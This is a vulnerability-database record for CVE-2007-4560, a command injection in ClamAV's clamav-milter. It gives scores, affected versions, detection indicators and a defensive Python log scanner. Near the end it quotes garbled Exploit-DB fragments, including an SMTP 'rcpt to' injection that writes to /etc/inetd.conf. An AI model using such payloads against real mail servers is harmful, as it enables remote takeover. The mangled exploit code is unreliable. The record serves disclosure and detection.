CVE-2007-4560
Published 2007-08-28
Priority: P272 high · CVSS 2.0: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Exploit: available · EPSS: 83.54% (99.6th percentile)
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clam_anti-virus | clamav | <= 0.91.1 | — |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| debian | clamav | < clamav 0.91.2-1~volatile1 (bookworm) | clamav 0.91.2-1~volatile1 (bookworm) |
Detection & IOCs (extracted from sources)
- Detect shell metacharacters injected into the SMTP RCPT TO field targeting clamav-milter in black hole mode; the exploit injects a semicolon-delimited shell command into the recipient address.
- Detect a malicious payload injected into the SMTP From: header as a semicolon-prefixed shell command (e.g., 'From: ;<payload>'), which is written to a clamav-milter temp file and later executed via 'sh msg*'.
- Monitor for shell execution of wildcard-expanded filenames in /tmp/clamav-* directories, indicative of the 'sh msg*' payload execution technique used by this exploit.
- Alert on SMTP RCPT TO commands containing shell redirection characters (e.g., >, |) or semicolons, which are the metacharacters exploited in the insecure popen() call.
- Note: the vulnerability is only exploitable when clamav-milter is run with black hole mode enabled; deployments without black hole mode are not affected.
- Note: the exploit targets ClamAV versions prior to 0.91.2; upgrading to 0.91.2 or later resolves the insecure popen() argument escaping issue.
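A defender-side check for the RCPT TO items above, added here as an example that is not part of this record, of ClamAV or of any of the listed sources: a small Python scanner that parses constructed SMTP transaction log lines (the `cmd="..."` log format, host names and addresses are assumptions) and reports every RCPT TO address carrying the shell metacharacters the advisory names.

```python
import re
from typing import Dict, List

# Shell metacharacters that a string reaching sh via popen() must never carry.
# The advisory names ';', '>' and '|'; backtick, '&', '$' and '<' are included
# for the same reason.
SHELL_META_RE = re.compile(r"[;|&`$<>]")

# Captures the recipient between the angle brackets of an RCPT TO command as
# recorded in the assumed log format below.
RCPT_RE = re.compile(r'cmd="RCPT TO:<(.*)>"\s*$', re.IGNORECASE)

# Constructed sample log lines; the "cmd=..." format is an assumption for this
# example, not sendmail's or clamav-milter's real logging.
SAMPLE_LOG = '''\
2007-08-28T10:00:01 mx1 smtpd[1234]: client=203.0.113.5 cmd="RCPT TO:<alice@example.org>"
2007-08-28T10:00:02 mx1 smtpd[1234]: client=203.0.113.5 cmd="RCPT TO:<"bob;id"@example.org>"
2007-08-28T10:00:03 mx1 smtpd[1235]: client=198.51.100.7 cmd="MAIL FROM:<>"
2007-08-28T10:00:04 mx1 smtpd[1235]: client=198.51.100.7 cmd="RCPT TO:<"x>/tmp/out"@localhost>"
2007-08-28T10:00:05 mx1 smtpd[1236]: client=192.0.2.9 cmd="RCPT TO:<carol+news@example.org>"
'''


def shell_metachars(address: str) -> List[str]:
    """Return the distinct shell metacharacters present in an address.

    Quoting is deliberately ignored: RFC 5321 allows a quoted local part such
    as "bob;id", but once the address is interpolated into a shell command line
    the quotes do not protect the milter, so any metacharacter is a finding.
    """
    return sorted(set(SHELL_META_RE.findall(address)))


def is_suspicious_recipient(address: str) -> bool:
    """True when the address would carry metacharacters into a popen() call."""
    return bool(shell_metachars(address))


def find_rcpt_metachars(lines: List[str]) -> List[Dict[str, object]]:
    """Scan log lines and report every RCPT TO carrying shell metacharacters."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        m = RCPT_RE.search(line)
        if not m:
            continue  # not an RCPT TO command
        recipient = m.group(1)
        hits = shell_metachars(recipient)
        if hits:
            findings.append({"line": line, "recipient": recipient, "metachars": hits})
    return findings


if __name__ == "__main__":
    for f in find_rcpt_metachars(SAMPLE_LOG.splitlines()):
        print(f"ALERT metachars={f['metachars']} rcpt={f['recipient']!r}")
```

On the constructed sample this flags two of the five lines (the recipients containing `;` and `>`). A hit is only meaningful on hosts that run clamav-milter in black hole mode on a version below 0.91.2, which is why the check is best paired with an inventory of where that mode is enabled.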
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.6 | HIGH | AV:N/AC:H/Au:N/C:C/I:C/A:C |
| osv | — | 7.6 | HIGH | — |
| vendor_debian | — | 7.6 | HIGH | — |
GHSA
GHSA-86rv-pvv7-jwp8 (ghsa_unreviewed, 2022-05-01): CVE-2007-4560, HIGH, CWE-78. Same description as the CVE text above.
OSV
CVE-2007-4560 (osv, 2007-08-28): HIGH, CVSS 7.6. Same description as the CVE text above.
Debian
CVE-2007-4560 (vendor_debian, 2007): package clamav, HIGH, CVSS 7.6. Same description as the CVE text above.
Scope: local
bookworm: resolved (fixed in 0.91.2-1~volatile1)
bullseye: resolved (fixed in 0.91.2-1~volatile1)
forky: resolved (fixed in 0.91.2-1~volatile1)
sid: resolved (fixed in 0.91.2-1~volatile1)
trixie: resolved (fixed in 0.91.2-1~volatile1)
No detection rules found.
Exploit-DB
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit) (exploitdb, 2010-10-09; CVE-2007-4560)
---
##
# $Id: clamav_milter_blackhole.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patr
Exploit-DB
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution (exploitdb, 2007-12-21; CVE-2007-4560)
Sendmail with clamav-milter new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: \r\n";
print $sock "data\r\n.\r\nquit\r\n";
while () {
print;
}
# milw0rm.com [2007-12-21]
Exploit-DB
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit) (exploitdb, 2007-08-24; CVE-2007-4560)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$R
Metasploit
ClamAV Milter Blackhole-Mode Remote Code Execution
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.
References
- http://docs.info.apple.com/article.html?artnum=307562
- http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
- http://secunia.com/advisories/26654
- http://secunia.com/advisories/26674
- http://secunia.com/advisories/26683
- http://secunia.com/advisories/26751
- http://secunia.com/advisories/26822
- http://secunia.com/advisories/26916
- http://secunia.com/advisories/29420
- http://security.gentoo.org/glsa/glsa-200709-14.xml
- http://securityreason.com/securityalert/3063
- http://www.debian.org/security/2007/dsa-1366
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:172
- http://www.novell.com/linux/security/advisories/2007_18_sr.html
- http://www.nruns.com/security_advisory_clamav_remote_code_exection.php
- http://www.securityfocus.com/archive/1/477723/100/0/threaded
- http://www.securityfocus.com/bid/25439
- http://www.securitytracker.com/id?1018610
- http://www.trustix.org/errata/2007/0026/
- http://www.vupen.com/english/advisories/2008/0924/references
- https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html